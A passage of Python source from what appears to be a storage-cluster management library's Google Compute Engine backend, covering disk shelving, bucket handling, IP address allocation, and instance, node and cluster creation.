log.info("{}: detaching and deleting {}".format(instance['name'], name))
try:
r = _gce_do(conn.instances().detachDisk, project=self.project_id, zone=zone, instance=instance['name'], deviceName=nrd['deviceName'])
self._wait_for_operation(r, msg='disk to be detached', zone=zone)
r = _gce_do(disk_srv.delete, project=self.project_id, zone=zone, disk=name)
self._wait_for_operation(r, msg='disk to be deleted', zone=zone)
except Exception:
detach_failed.append(name)
# XXX assume all volume attributes are uniform
disk_size = data['sizeGb']
disk_type = data['type']
if detach_failed:
errors['notdetached'] = ','.join(detach_failed)
shelved = "{}|{}|{}".format(len(non_root_disks), disk_size, disk_type)
if errors:
shelved += '|{}'.format(errors)
log.debug("Creating shelved metadata: {}".format(shelved))
instance = self.refresh(instance)
self._set_metadata(instance, "shelved", shelved)
def unshelve(self, instance, count_override=None, size_override=None, type_override=None, **options): #pylint: disable=unused-argument,arguments-differ
''' bring our instance back to life. This requires a metadata tag called
shelved that contains the number of disks and their size/type
Arguments:
instance: backend instance
count_override (int, optional): number of data disks
size_override (int, optional): size of data disks
type_override (str, optional): type of data disks
Raises: vFXTServiceFailure
'''
conn = self.connection()
zone = instance['zone'].split('/')[-1]
# assume we've previously killed the data disks and set a tag
if not self._get_metadata(instance, "shelved"):
log.info("{} does not have shelved tag, skipping".format(instance['name']))
return
# XXX assume instance is already stopped
if self.is_on(instance):
log.info("{} is not stopped, skipping".format(instance['name']))
return
try:
attrs = self._get_metadata(instance, "shelved").split('|')
vol_count, vol_size, vol_type = attrs[0:3]
except Exception:
log.error("{} does not have data in the shelved tag".format(instance['name']))
return
if len(instance['disks']) > 1:
log.info("{} appears to already have data disks, skipping".format(instance['name']))
return
if count_override:
vol_count = count_override
if size_override:
vol_size = size_override
if type_override:
vol_type = type_override
i_srv = conn.instances()
d_srv = conn.disks()
disks_created = []
try:
for i in range(int(vol_count)):
disk_name = "{}-data-{}".format(instance['name'], i + 1)
body = {'name': disk_name, "sizeGb": int(vol_size), 'type': vol_type}
log.info("{}: creating {} volume {}".format(instance['name'], vol_size, disk_name))
r = _gce_do(d_srv.insert, project=self.project_id, zone=zone, body=body)
self._wait_for_operation(r, msg='disk to be created', zone=zone)
d = _gce_do(d_srv.get, project=self.project_id, zone=zone, disk=disk_name)
disks_created.append(d)
body = {'deviceName': disk_name, "source": d['selfLink'], "autoDelete": True}
log.info("{}: attaching disk {}".format(instance['name'], disk_name))
r = _gce_do(i_srv.attachDisk, project=self.project_id, zone=zone, instance=instance['name'], body=body)
self._wait_for_operation(r, msg='disk to be attached', zone=zone)
except Exception as e:
log.debug(e)
log.error("Error while creating volumes, undoing what we did")
instance = self.refresh(instance)
for d in disks_created:
if d['name'] in [dev['deviceName'] for dev in instance['disks']]:
r = _gce_do(i_srv.detachDisk, project=self.project_id, zone=zone, instance=instance['name'], deviceName=d['name'])
self._wait_for_operation(r, msg='disk to be detached', zone=zone)
r = _gce_do(d_srv.delete, project=self.project_id, zone=zone, disk=d['name'])
self._wait_for_operation(r, msg='disk to be deleted', zone=zone)
raise_from(vFXTServiceFailure(e), e)
self.start(instance)
instance = self.refresh(instance)
self._delete_metadata(instance, 'shelved')
# No GCE equivalent
def wait_for_service_checks(self, instance, retries=ServiceBase.WAIT_FOR_SERVICE_CHECKS): pass
# storage/buckets
def create_bucket(self, name, **options): #pylint: disable=arguments-differ
'''Create a bucket
Arguments:
name (str): bucket name to create
storage_class (str, optional): storage class of MULTI_REGIONAL, REGIONAL,
STANDARD, NEARLINE, COLDLINE, and DURABLE_REDUCED_AVAILABILITY
region (str, optional): region for the bucket if using REGIONAL (defaults to service default region)
tags (dict, optional): tag labels to apply to the bucket
Raises: vFXTServiceFailure
'''
if not self.valid_bucketname(name):
raise vFXTConfigurationException("{} is not a valid bucket name".format(name))
storage_service = self.connection(connection_type='storage')
storage_class = options.get('storage_class') or 'STANDARD'
if not storage_class in self.STORAGE_CLASSES:
raise vFXTConfigurationException("{} is not a valid storage class".format(storage_class))
body = {'name': name, 'storageClass': storage_class}
if storage_class == 'REGIONAL':
region = options.get('region') or self._zone_to_region(self.zones[0])
body['location'] = region
if 'tags' in options:
labels = options.get('tags')
bad_name_re = re.compile('[^a-z_]')
filtered_labels = {k: v for k, v in viewitems(labels) if not k.startswith('_') and not re.search(bad_name_re, k)}
if len(filtered_labels) != len(labels):
l_keys = set(labels.keys())
fl_keys = set(filtered_labels.keys())
err = "Discarding invalid bucket labels: {}".format(', '.join(l_keys - fl_keys))
log.error(err)
body['labels'] = filtered_labels
log.debug("Bucket create request {}".format(body))
return _gce_do(storage_service.buckets().insert, project=self.project_id, body=body)
def delete_bucket(self, name):
'''Delete a bucket
Arguments:
name (str): bucket name
Raises: vFXTServiceFailure
'''
try:
storage_service = self.connection(connection_type='storage')
_gce_do(storage_service.buckets().delete, bucket=name)
except Exception as e:
raise_from(vFXTServiceFailure("Failed to delete bucket {}: {}".format(name, e)), e)
def authorize_bucket(self, cluster, name, retries=ServiceBase.CLOUD_API_RETRIES, xmlrpc=None):
'''Perform any backend work for the bucket, and register a credential
for it to the cluster
No authorization is currently performed for GCE.
Arguments:
cluster (Cluster): cluster object
name (str): bucket name
retries (int, optional): number of attempts to make
xmlrpc (xmlrpcClt, optional): number of attempts to make
Raises: vFXTServiceFailure
'''
xmlrpc = cluster.xmlrpc() if xmlrpc is None else xmlrpc
existing_creds = cluster._xmlrpc_do(xmlrpc.corefiler.listCredentials, _xmlrpc_do_retries=retries)
# see if we have s3 interop credentials
if self.s3_access_key and self.s3_secret_access_key:
log.debug("Found s3 access keys")
cred_name = 's3-{}'.format(cluster.name)
# if it exists, use it
if cred_name in [c['name'] for c in existing_creds]:
return cred_name
log.debug("Creating credential {}".format(cred_name))
cred_body = {
'accessKey': self.s3_access_key,
'privateKey': self.s3_secret_access_key,
}
r = cluster._xmlrpc_do(xmlrpc.corefiler.createCredential, cred_name, self.COREFILER_CRED_TYPE, cred_body)
if r != 'success':
raise vFXTConfigurationException("Could not create credential {}: {}".format(cred_name, r))
return cred_name
# otherwise use the first default
if not existing_creds:
raise vFXTConfigurationException("Could not find existing credential to use")
return existing_creds[0]['name']
# networking
def get_default_router(self, subnetwork=None): #pylint: disable=arguments-differ
'''Get default route address
Arguments:
subnetwork (str, optional): subnetwork name
Returns:
str: address of default router
'''
network = self._get_network()
if 'gatewayIPv4' in network:
return network['gatewayIPv4']
if 'subnetworks' in network:
region = self._zone_to_region(self.zones[0])
region_gateways = [] # subnetwork gateways associated with our region
subnetwork = subnetwork or self.subnetwork_id
# try to find a direct match if we have a subnetwork
subnetworks = self._get_subnetworks(region)
for sn in subnetworks:
if subnetwork and sn['name'] == subnetwork:
return sn['gatewayAddress']
region_gateways.append(sn['gatewayAddress'])
# otherwise pick one associated with our region
if region_gateways:
return region_gateways[0]
raise vFXTConfigurationException("Unable to determine default router for this configuration")
def get_dns_servers(self):
'''Get DNS server addresses
Returns:
[str]: list of DNS server addresses
'''
dns = []
dns.extend(self.DNS_SERVERS)
dns.insert(0, self.get_default_router())
return dns
def get_ntp_servers(self):
'''Get NTP server addresses
Returns:
[str]: list of NTP server addresses
'''
return self.NTP_SERVERS
def in_use_addresses(self, cidr_block, category='all'): #pylint: disable=arguments-differ
'''Return a list of in use addresses within the specified cidr
Arguments:
cidr_block (str)
category (str): all, interfaces, routes
'''
conn = self.connection()
c = Cidr(cidr_block)
addresses = set()
if category in ['all', 'interfaces']:
for instance in self.find_instances(all_regions=True):
for interface in instance['networkInterfaces']:
interface_address = interface.get('networkIP')
if interface_address:
if c.contains(interface_address):
addresses.add(interface_address)
if 'aliasIpRanges' in interface:
ip_aliases = interface.get('aliasIpRanges')
for ip_alias in ip_aliases:
if '/' in ip_alias['ipCidrRange'] and ip_alias['ipCidrRange'].split('/')[-1] != '32':
alias_range = Cidr(ip_alias['ipCidrRange'])
alias_addresses = Cidr.expand_address_range(alias_range.start_address(), alias_range.end_address())
addresses.update(alias_addresses)
continue
alias_address = ip_alias['ipCidrRange'].split('/')[0]
if c.contains(alias_address):
addresses.add(alias_address)
if category in ['all', 'routes']:
search = 'destRange eq .*/32' # only point to point addresses
resp = _gce_do(conn.routes().list, project=self.network_project_id, filter=search)
if resp and 'items' in resp:
for route in resp['items']:
# skip if we don't have a next hop instance (dangling route)
if any([_['code'] == 'NEXT_HOP_INSTANCE_NOT_FOUND' for _ in route.get('warnings', [])]) or 'nextHopInstance' not in route:
continue
addr = route['destRange'].split('/')[0]
if c.contains(addr):
addresses.add(addr)
return list(addresses)
def _cidr_overlaps_network(self, cidr_range):
'''Check if a given cidr range falls within any of the network/subnetwork ranges
of the current configuration
cidr_range (str): IP address range in CIDR notation
'''
cidr = Cidr(cidr_range)
address = cidr.start_address()
network = self._get_network()
if 'subnetworks' in network:
subnetwork = self._get_subnetwork(self.subnetwork_id)
for r in subnetwork.get('secondaryIpRanges', []):
if 'ipCidrRange' not in r:
continue
secondary_range = Cidr(r['ipCidrRange'])
if secondary_range.contains(address):
return True
if 'ipCidrRange' in subnetwork:
subnetwork_range = Cidr(subnetwork['ipCidrRange'])
if subnetwork_range.contains(address):
return True
else: # legacy
network_range = Cidr(network['IPv4Range'])
if network_range.contains(address):
return True
return False
def get_available_addresses(self, count=1, contiguous=False, addr_range=None, in_use=None):
'''Returns a list of available addresses for the given range
Arguments:
count (int, optional): number of addresses required
contiguous (bool=False): addresses must be contiguous
addr_range (str, optional): address range cidr block
in_use ([str], optional): list of addresses known to be used
Returns:
([], str): tuple of address list and netmask str
Raises: vFXTConfigurationException
'''
honor_reserves = True # leave out reserved (first 4) addresses in a cidr range
# find an unused range, either provided or default
addr_range = addr_range or self.private_range
if addr_range:
log.debug("Using specified address range {}".format(addr_range))
else:
network = self._get_network()
if 'subnetworks' in network:
subnetwork = self._get_subnetwork(self.subnetwork_id)
if 'secondaryIpRanges' in subnetwork:
honor_reserves = False
r = subnetwork['secondaryIpRanges'][0] # XXX only using the first one (support more than one if avail?)
addr_range = r['ipCidrRange']
log.debug("Using subnetwork {} {} secondary range of {}".format(subnetwork['name'], r.get('rangeName', 'unnamed'), r['ipCidrRange']))
else:
log.debug("Using subnetwork {} range of {}".format(subnetwork['name'], subnetwork['ipCidrRange']))
addr_range = subnetwork['ipCidrRange']
# otherwise we use our defaults
addr_range = addr_range or self.DEFAULT_CLUSTER_NETWORK_RANGE
used = self.in_use_addresses(addr_range)
if in_use:
used.extend(in_use)
used = list(set(used))
addr_cidr = Cidr(addr_range)
try:
avail = addr_cidr.available(count, contiguous, used, honor_reserves)
netmask = "255.255.255.255" # hardcoded for gce /32
return (avail, netmask)
except Exception as e:
raise_from(vFXTConfigurationException("Check that the subnetwork or specified address range has enough free addresses: {}".format(e)), e)
def export(self):
'''Export the service object in an easy to serialize format
Returns:
{}: serializable dictionary
'''
data = {
'zone': self.zones,
'network_id': self.network_id,
'client_email': self.client_email,
'project_id': self.project_id
}
if self.key_file:
data['key_file'] = self.key_file
if self.key_data:
data['key_data'] = self.key_data
if self.access_token:
data['access_token'] = self.access_token
if self.s3_access_key:
data['s3_access_key'] = self.s3_access_key
if self.s3_secret_access_key:
data['s3_secret_access_key'] = self.s3_secret_access_key
if self.private_range:
data['private_range'] = self.private_range
if self.proxy_uri:
data['proxy_uri'] = self.proxy_uri
if self.subnetwork_id:
data['subnetwork_id'] = self.subnetwork_id
return data
def create_instance(self, machine_type, name, boot_disk_image, other_disks=None, **options): #pylint: disable=arguments-differ
'''Create and return a GCE instance
Arguments:
machine_type (str): GCE machine type
name (str): name of the instance
boot_disk_image (str): the name of the disk image for the root disk
boot_disk (str, optional): the name of an existing disk for use as the root disk (instead of a disk image)
other_disks ([], optional): GCE disk definitions
metadata (dict, optional): metadata tags to apply to instance
disk_type (str, optional): type of disk to use for root disk
root_size (int, optional): root disk size in GB
tags ([], optional): list of GCE network tags to apply to the instance
labels ({}, optional): dictionary of GCE labels to apply to the instance
zone (str, optional): create in custom zone
auto_public_address (bool, optional): auto assign a public address (defaults to False)
private_ip_address (str, optional): primary private IP address
wait_for_success (int, optional): wait time for the instance to report success (default WAIT_FOR_SUCCESS)
service_account (str, optional): Service account name to start the instance with (defaults to the default service account)
scopes ([], optional): List of service scopes for the instance (default DEFAULT_SCOPES)
subnetwork (str, optional): subnetwork path (projects/project-foo/regions/us-east1/subnetworks/foo)
Raises: vFXTConfigurationException, vFXTServiceFailure
Service failures here are uncaught exceptions and should be handled
by the caller.
boot_disk_image format is the image name for local images (or the more
formal global/images/my-private-image). For images from other projects,
the format is projects/<project>/global/images/<image name>. The full
URL also is accepted.
'''
if not self.valid_instancename(name):
raise vFXTConfigurationException("{} is not a valid instance name".format(name))
if self.get_instance(name):
raise vFXTConfigurationException("{} exists".format(name))
machine_defs = self.MACHINE_DEFAULTS[machine_type]
conn = self.connection()
network = self._get_network()
zone = options.get('zone') or self.zones[0]
subnetwork = options.get('subnetwork') or self.subnetwork_id
disk_type = options.get('disk_type') or machine_defs['root_disk_type']
root_size = options.get('root_size') or None
metadata = options.get('metadata', None)
disk_type = _gce_do(conn.diskTypes().get, project=self.project_id, zone=zone, diskType=disk_type)
boot_image = {}
if boot_disk_image:
try:
boot_image = _gce_do(conn.images().get, project=self.project_id, image=boot_disk_image)
except Exception:
log.debug("Could not find boot_disk_image in our list of images, assuming public/other")
boot_image['selfLink'] = boot_disk_image
# gce instance defaults
# https://cloud.google.com/compute/docs/reference/latest/instances#resource
body = {}
body['name'] = name
body['machineType'] = "{}/{}/zones/{}/machineTypes/{}".format(self.GCE_URL, self.project_id, zone, machine_type)
body['disks'] = [{
'autoDelete': True,
'boot': True,
'type': 'PERSISTENT',
'deviceName': '{}-boot'.format(name),
}
]
if options.get('boot_disk'):
# fetch the disk
boot_disk = _gce_do(conn.disks().get, project=self.project_id, zone=zone, disk=options.get('boot_disk'))
body['disks'][0]['autoDelete'] = False
body['disks'][0]['source'] = boot_disk['selfLink']
else:
body['disks'][0]['initializeParams'] = {
'diskName': '{}-boot'.format(name),
'diskType': disk_type['selfLink'],
'sourceImage': boot_image['selfLink']
}
if root_size:
body['disks'][0]['initializeParams']['diskSizeGb'] = int(root_size)
if other_disks:
body['disks'].extend(other_disks)
body['networkInterfaces'] = [{'network': network['selfLink']}]
if subnetwork:
subnetwork = self._get_subnetwork(subnetwork)
body['networkInterfaces'][0]['subnetwork'] = subnetwork['selfLink']
body['networkInterfaces'][0]['network'] = subnetwork['network']
else:
subnetwork_region = self._zone_to_region(zone)
subnetworks = self._get_subnetworks(subnetwork_region)
if subnetworks: # no subnetwork specified, but we have them so use one
subnetwork = subnetworks[0]
log.warning("No subnetwork specified, picking {}".format(subnetwork['selfLink']))
body['networkInterfaces'][0]['subnetwork'] = subnetwork['selfLink']
body['networkInterfaces'][0]['network'] = subnetwork['network']
# optional ephemeral address
if options.get('auto_public_address', False):
nat_name = '{}-nat'.format(name)
nat_config = [{'kind': 'compute#accessConfig', 'type': 'ONE_TO_ONE_NAT', 'name': nat_name}]
body['networkInterfaces'][0]['accessConfigs'] = nat_config
if options.get('private_ip_address', False):
body['networkInterfaces'][0]['networkIP'] = options.get('private_ip_address')
if 'secondary_addresses' in options:
body['networkInterfaces'][0]['aliasIpRanges'] = []
for secondary_address in options.get('secondary_addresses'):
ip_cidr_range = {'ipCidrRange': secondary_address}
# if this is part of a subnetwork secondary range, we have to name it
if subnetwork:
for secondary_range in subnetwork.get('secondaryIpRanges', []):
if Cidr(secondary_range['ipCidrRange']).contains(secondary_address):
ip_cidr_range['subnetworkRangeName'] = secondary_range['rangeName']
body['networkInterfaces'][0]['aliasIpRanges'].append(ip_cidr_range)
scopes = options.get('scopes') or self.DEFAULT_SCOPES
if not isinstance(scopes, list) or not all([_.startswith('http') for _ in scopes]):
raise vFXTConfigurationException("Invalid scopes: {}".format(scopes))
body['serviceAccounts'] = [{
'email': options.get('service_account') or 'default',
'scopes': scopes
}]
body['canIpForward'] = True
body['tags'] = {'items': []}
body['labels'] = {}
body['metadata'] = {'items': []}
if 'tags' in options:
body['tags']['items'].extend(options['tags'])
if 'labels' in options:
body['labels'] = options['labels'].copy()
if metadata:
# google wants a list of this dict :-/
pairs = [{'key': k, 'value': v} for k, v in viewitems(metadata)]
body['metadata']['items'].extend(pairs)
log.debug("create_instance request body: {}".format(body))
try:
request_id = str(uuid.uuid4())
r = _gce_do(conn.instances().insert, project=self.project_id, zone=zone, requestId=request_id, body=body)
wait_for_success = options.get('wait_for_success') or self.WAIT_FOR_SUCCESS
self._wait_for_operation(r, msg='instance {} to be created'.format(name), retries=wait_for_success, zone=zone)
retries = self.CLOUD_API_RETRIES
while retries > 0:
n = self.get_instance(name)
if n:
return n
retries -= 1
time.sleep(self.POLLTIME)
raise vFXTServiceFailure("Unable to locate the created instance {}".format(name))
except Exception as e:
raise_from(vFXTServiceFailure("Create instance failed: {}".format(e)), e)
def create_node(self, node_name, cfg, node_opts, instance_options):
'''Create a cluster node
This is a frontend for create_instance that handles vFXT node specifics
Arguments:
node_name (str): name of the node
cfg (str): configuration string to pass to the node
node_opts (dict): node creation options
instance_options (dict): options passed to create_instance
node_opts include:
data_disk_size: size of data disks (in MB)
data_disk_type: disk type of data disk (pd-standard, pd-ssd, local-ssd)
data_disk_count: number of data disks
data_disk_nvme (bool): use NVME instead of SCSI
metadata (dict)
machine_type
root_image: disk image name
disk_type: root disk type
'''
conn = self.connection()
if self.get_instance(node_name):
raise vFXTNodeExistsException("Node {} exists".format(node_name))
use_local_ssd = False
if node_opts['data_disk_type'] == 'local-ssd':
use_local_ssd = True
# local-ssd sizes cannot be anything but 375
node_opts['data_disk_size'] = 375
if int(node_opts['data_disk_count']) > 8:
raise vFXTConfigurationException("{} is larger than 8, the maximum for number of local-ssd disks".format(node_opts['data_disk_count']))
zone = instance_options.get('zone') or self.zones[0]
data_disk_url = _gce_do(conn.diskTypes().get, project=self.project_id, zone=zone, diskType=node_opts['data_disk_type'])['selfLink']
data_disk_disks = []
try:
node_meta = node_opts.get('metadata', {})
node_meta['cluster_cfg'] = cfg
for idx in range(node_opts['data_disk_count']):
data_disk_name = "{}-data-{}".format(node_name, idx + 1)
data_disk_disk = {}
# local-ssd can only be created atomically with the instance so
# we only define it here
if use_local_ssd:
data_disk_disk = {
'autoDelete': True,
'type': 'SCRATCH',
'interface': 'NVME' if node_opts.get('data_disk_nvme') else 'SCSI',
'deviceName': data_disk_name,
'initializeParams': {
'diskType': data_disk_url,
'diskSizeGb': node_opts['data_disk_size'],
},
}
else: # otherwise, create the data disks before the instance
body = {'name': data_disk_name, 'sizeGb': int(node_opts['data_disk_size']), 'type': data_disk_url}
log.info("Creating data disk {} for {}".format(idx + 1, node_name))
log.debug("data disk request body: {}".format(body))
r = _gce_do(conn.disks().insert, project=self.project_id, zone=zone, body=body)
self._wait_for_operation(r, msg='disk to be created', zone=zone)
created_disk = _gce_do(conn.disks().get, project=self.project_id, zone=zone, disk=data_disk_name)
data_disk_disk = {'autoDelete': True, 'type': 'PERSISTENT', 'source': created_disk['selfLink'], 'deviceName': data_disk_name}
data_disk_disks.append(data_disk_disk)
log.info("Creating node {}".format(node_name))
n = self.create_instance(machine_type=node_opts['machine_type'],
name=node_name,
boot_disk_image=node_opts['root_image'],
disk_type=node_opts.get('disk_type') or None,
other_disks=data_disk_disks,
metadata=node_meta,
**instance_options
)
log.info("Created {} ({})".format(n['selfLink'], n['networkInterfaces'][0]['networkIP']))
return n
except (vFXTServiceFailure, vFXTConfigurationException) as e:
log.debug(e)
n = self.get_instance(node_name)
if n:
self.destroy(n)
elif data_disk_disks:
for data_disk_disk in data_disk_disks:
if data_disk_disk['type'] != 'PERSISTENT': # only created disks
continue
try:
log.debug("Removing data disk {}".format(data_disk_disk['deviceName']))
r = _gce_do(conn.disks().delete, project=self.project_id, zone=zone, disk=data_disk_disk['deviceName'])
self._wait_for_operation(r, msg='disk to be deleted', zone=zone)
except Exception as disk_e:
log.error("Failed to remove data disk: {}".format(disk_e))
raise
def create_cluster(self, cluster, **options):
'''Create a vFXT cluster (calls create_node for each node)
Typically called via vFXT.Cluster.create()
Arguments:
cluster (vFXT.cluster.Cluster): cluster object
size (int, optional): size of cluster (node count)
root_image (str, optional): root disk image name
disk_type (str, optional): root disk type
data_disk_size (int, optional): size of data disk (or machine type default)
data_disk_count (int, optional): number of data disks (or machine type default)
data_disk_type (str, optional): type of data disks (or machine type default)
metadata (dict, optional): metadata for instance
config_expiration (int, optional): expiration time for cluster join configuration
skip_cleanup (bool, optional): do not clean up on failure
zones ([str], optional): one or more zones
management_address (str, optional): management address for the cluster
instance_addresses ([], optional): list of instance addresses to use (passed to create_cluster(private_ip_address))
address_range_start (str, optional): The first of a custom range of addresses to use for the cluster
address_range_end (str, optional): The last of a custom range of addresses to use for the cluster
address_range_netmask (str, optional): cluster address range netmask
Additional arguments are passed through to create_node()
Raises: vFXTConfigurationException, vFXTCreateFailure
root_image format is the image name for local images (or the more
formal global/images/my-private-image). For images from other projects,
the format is projects/<project>/global/images/<image name>. The full
URL also is accepted.
'''
if not all([cluster.mgmt_ip, cluster.mgmt_netmask, cluster.cluster_ip_start, cluster.cluster_ip_end]):
raise vFXTConfigurationException("Cluster networking configuration is incomplete")
# if using shared vpc/xpn, we cannot use routes for addressing
if self.project_id != self.network_project_id:
if not self._cidr_overlaps_network('{}/32'.format(cluster.cluster_ip_start)):
raise vFXTConfigurationException("Cluster addresses must reside within the Shared VPC address ranges")
zones = options.get('zones') or self.zones
zones = zones if isinstance(zones, list) else [zones]
# extend our service zones if necessary
for z in zones:
if z not in self.zones:
self.zones.append(z)
cluster.zones = [zones[0]] # first node zone
machine_type = cluster.machine_type
if machine_type not in self.MACHINE_TYPES:
raise vFXTConfigurationException("{} is not a valid instance type".format(machine_type))
zone_machine_types = self._zone_machine_types()
if not all([_ for _ in zones if _ in zone_machine_types.keys() and machine_type in zone_machine_types[_]]):
err = "{} is not available in all requested zones: {}".format(machine_type, ', '.join(zones))
raise vFXTConfigurationException(err)
machine_defs = self.MACHINE_DEFAULTS[machine_type]
cluster_size = int(options.get('size', machine_defs['node_count']))
log.info('Creating cluster configuration')
cfg = cluster.cluster_config(expiration=options.get('config_expiration', None))
log.debug("Generated cluster config: {}".format(cfg.replace(cluster.admin_password, '[redacted]')))
# gce needs them base64 encoded
cfg = base64.b64encode(cfg.encode('utf-8')).decode()
disk_type = options.get('disk_type') or machine_defs['root_disk_type']
root_image = options.get('root_image') or self._get_default_image()
data_disk_size = options.get('data_disk_size') or machine_defs['data_disk_size']
data_disk_count = options.get('data_disk_count') or machine_defs['data_disk_count']
data_disk_type = options.get('data_disk_type') or machine_defs['data_disk_type']
data_disk_nvme = options.get('data_disk_nvme', False)
metadata = options.pop('metadata', {})
instance_addresses = cluster.instance_addresses or [None] * cluster_size
# our private addresses must be inside the network ranges
if instance_addresses[0] and not self._cidr_overlaps_network('{}/32'.format(instance_addresses[0])):
log.debug("Resetting instance addresses to be provided via the backend service")
instance_addresses = [None] * cluster_size
try:
# create the initial node
name = '{}-{:02}'.format(cluster.name, 1)
opts = {'data_disk_count': data_disk_count, 'data_disk_size': data_disk_size,
'data_disk_type': data_disk_type, 'metadata': metadata.copy(),
'machine_type': machine_type, 'root_image': root_image,
'disk_type': disk_type, 'data_disk_nvme': data_disk_nvme}
options['zone'] = zones[0] # first node zone
options['private_ip_address'] = instance_addresses.pop(0)
n = self.create_node(name, cfg, node_opts=opts, instance_options=options)
cluster.nodes.append(ServiceInstance(service=self, instance=n))
threads = []
if not options.get('skip_configuration'):
t = threading.Thread(target=cluster.first_node_configuration)
t.setDaemon(True)
t.start()
threads.append(t)
options.update(opts)
options['instance_addresses'] = instance_addresses
options['zone'] = zones if len(zones) == 1 else zones[1:]
self.add_cluster_nodes(cluster, cluster_size - 1, **options)
# do a timeout join to handle KeyboardInterrupts
while all([_.is_alive() for _ in threads]):
for t in threads:
t.join(10)
if cluster.first_node_error:
raise cluster.first_node_error
except vFXTNodeExistsException as e:
log.error("Failed to create node: {}".format(e))
raise
except (KeyboardInterrupt, Exception) as e:
if not log.isEnabledFor(logging.DEBUG):
log.exception(e)
log.error("Failed to create nodes: {}".format(e))
if not options.get('skip_cleanup', False):
cluster.destroy(quick_destroy=True)
raise_from(vFXTCreateFailure(e), e)
def post_destroy_cluster(self, cluster):
'''Post cluster destroy cleanup'''
# does nothing here
def add_cluster_nodes(self, cluster, count, **options):
'''Add nodes to the cluster (delegates to create_node())
Arguments:
cluster (vFXT.cluster.Cluster): cluster object
count (int): number of nodes to add
skip_cleanup (bool, optional): do not clean up on failure
**options: passed to create_node()
Raises: exceptions from create_node()
'''
if count < 1: return
zones = options.get('zone') or cluster.zones if hasattr(cluster, 'zones') else self.zones
zones = zones if isinstance(zones, list) else [zones]
# make sure to use unused zones first, but account for our cluster zones
zones.extend([z for z in cluster.zones if z not in zones])
cycle_zones = cycle(zones)
instance_addresses = options.pop('instance_addresses', [None] * count)
if len(instance_addresses) != count:
raise vFXTConfigurationException("Not enough instance addresses provided, require {}".format(count))
if instance_addresses[0] and not self._cidr_overlaps_network('{}/32'.format(instance_addresses[0])):
log.debug("Resetting instance addresses to be provided via the backend service")
instance_addresses = [None] * count
# look at cluster.nodes[0].instance
instance = cluster.nodes[0].instance
instance_zone = instance['zone'].split('/')[-1]
disks = instance['disks']
root_disk = [d for d in disks if 'boot' in d and d['boot']][0]
non_root_disks = [d for d in disks if 'boot' not in d or not d['boot']]
data_disk_count = options.get('data_disk_count', len(non_root_disks))
if data_disk_count == 0:
raise vFXTConfigurationException("Cannot determine data disk configuration")
if 'items' in instance['tags'] and not options.get('tags'):
options['tags'] = instance['tags']['items']
if 'email' in instance['serviceAccounts'] and 'service_account' not in options:
options['service_account'] = instance['serviceAccounts']['email']
metadata = {opt['key']: opt['value'] for opt in instance['metadata']['items']}
# overrides
opts = {'data_disk_count': data_disk_count, 'metadata': metadata, 'machine_type': cluster.machine_type}
overrides = ['machine_type', 'data_disk_size', 'data_disk_type', 'root_image', 'disk_type']
for o in overrides:
if o in options:
opts[o] = options.pop(o)
if 'metadata' in options: # even if empty
opts['metadata'].update(options.pop('metadata') or {})
conn = None
# root disk info
if 'root_image' not in opts or 'disk_type' not in opts:
conn = self.connection()
disk_name = root_disk['source'].split('/')[-1]
disk_data = _gce_do(conn.disks().get, project=self.project_id, zone=instance_zone, disk=disk_name)
disk_type = disk_data['type'].split('/')[-1]
root_image = disk_data['sourceImage'] if 'sourceImage' in disk_data else self._get_default_image()
if 'root_image' not in opts:
opts['root_image'] = root_image
if 'disk_type' not in opts:
opts['disk_type'] = disk_type
# data info
if 'data_disk_size' not in opts or 'data_disk_type' not in opts:
data_disk_size = None
data_disk_type = None
if not conn:
conn = self.connection()
if non_root_disks[0]['type'] == 'SCRATCH':
data_disk_type = _gce_do(conn.diskTypes().get, project=self.project_id, zone=instance_zone, diskType='local-ssd')['selfLink'].split('/')[-1]
# there is not API to query the size of a non-persistent disk
data_disk_size = 375
else:
disk_name = non_root_disks[0]['source'].split('/')[-1]
disk_data = _gce_do(conn.disks().get, project=self.project_id, zone=instance_zone, disk=disk_name)
data_disk_size = disk_data['sizeGb']
data_disk_type = disk_data['type'].split('/')[-1]
if 'data_disk_size' not in opts:
opts['data_disk_size'] = data_disk_size
if 'data_disk_type' not in opts:
opts['data_disk_type'] = data_disk_type
# Requires cluster be online
# XXX assume our node name always ends in the node number
max_node_num = max([int(i.name().split('-')[-1]) for i in cluster.nodes])
joincfg = cluster.cluster_config(joining=True, expiration=options.get('config_expiration', None))
joincfg = base64.b64encode(joincfg.encode('utf-8')).decode()
nodeq = Queue.Queue()
failq = Queue.Queue()
threads = []
def cb(nodenum, inst_opts, nodeq, failq):
'''callback'''
try:
name = '{}-{:02}'.format(cluster.name, nodenum)
n = self.create_node(name, joincfg, node_opts=opts, instance_options=inst_opts)
nodeq.put(n)
except Exception as e:
if not log.isEnabledFor(logging.DEBUG):
log.exception(e)
failq.put(e)
for node_num in range(max_node_num, max_node_num + count):
next_node_num = node_num + 1
inst_opts = options.copy()
inst_opts['zone'] = next(cycle_zones)
inst_opts['private_ip_address'] = instance_addresses.pop(0)
t = threading.Thread(target=cb, args=(next_node_num, inst_opts, nodeq, failq,))
t.setDaemon(True)
t.start()
threads.append(t)
for t in threads:
t.join()
nodes = []
while True:
try:
n = nodeq.get_nowait()
nodes.append(ServiceInstance(service=self, instance=n))
except Queue.Empty:
break
failed = []
while True:
try:
failed.append(failq.get_nowait())
except Queue.Empty:
break
if failed:
if not options.get('skip_cleanup', False):
for n in nodes:
n.destroy()
raise Exception(failed)
cluster.nodes.extend(nodes)
def load_cluster_information(self, cluster, **options):
'''Loads cluster information from the service and cluster itself
'''
xmlrpc = cluster.xmlrpc()
# make sure mgmt_ip is set to the valid address (in case we used
# a node address to get in)
cluster.mgmt_ip = xmlrpc.cluster.get()['mgmtIP']['IP']
node_ips = {n['primaryClusterIP']['IP']
for name in xmlrpc.node.list()
for n in [xmlrpc.node.get(name)[name]]
if 'primaryClusterIP' in n}
# lookup nodes that have one of our primary IP addresses..
nodes = []
for node_ip in node_ips:
node = self._who_has_ip(node_ip)
if node:
nodes.append(node)
if nodes:
cluster.nodes = [ServiceInstance(self, instance=n) for n in nodes]
cluster.zones = list({node['zone'].split('/')[-1] for node in nodes})
# XXX assume all instances have the same settings
n = nodes[0]
cluster.machine_type = n['machineType'].split('/')[-1]
cluster.project_id = n['zone'].split('/')[-3]
cluster.network_project_id = self._get_network_project()
cluster.network_id = n['networkInterfaces'][0]['network'].split('/')[-1]
cluster.name = self.CLUSTER_NODE_NAME_RE.search(cluster.nodes[0].name()).groups()[0]
# gce specific
def _get_network(self):
'''Get the network object'''
conn = self.connection()
